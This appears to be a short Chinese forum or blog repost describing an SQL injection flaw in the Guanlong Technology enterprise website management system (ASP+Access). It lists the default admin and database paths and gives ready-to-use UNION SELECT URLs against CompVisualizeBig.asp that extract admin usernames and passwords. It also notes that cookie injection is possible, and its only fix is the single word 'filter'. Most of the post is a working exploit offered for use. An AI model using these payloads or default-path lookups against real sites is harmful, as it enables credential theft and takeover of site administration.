源码简介:
冠龙科技企业网站管理系统是基于ASP+ACCESS技术开发的电子商务平台,属于全自动化、全智能的在线方
式管理、维护、更新的网站管理系统。此系统直接上传到你的网站空间就可以使用了。完全后台操作。
×××:
/25/4771.htm
Demo:
//
默认后台:
/admin/login.asp
默认数据库:
/databases/%23database.mdb
exp:
//CompVisualizeBig.asp?id=23 union select 1,username%2bpassword,3,4,5 from admin
或者单独查:
//CompVisualizeBig.asp?id=23 union select 1,username,3,4,5 from admin
//CompVisualizeBig.asp?id=23 union select 1,password,3,4,5 from admin
另外还存在多处的漏洞.可cookies注入.
上次有朋友问%2b是什么?就是ascii码的"+"号的十六进制值.
修复:过滤.
转自: Mr.DzY
如果觉得《冠龙科技企业网站管理系统 sql注入漏洞及修复》对你有帮助,请点赞、收藏,并留下你的观点哦!
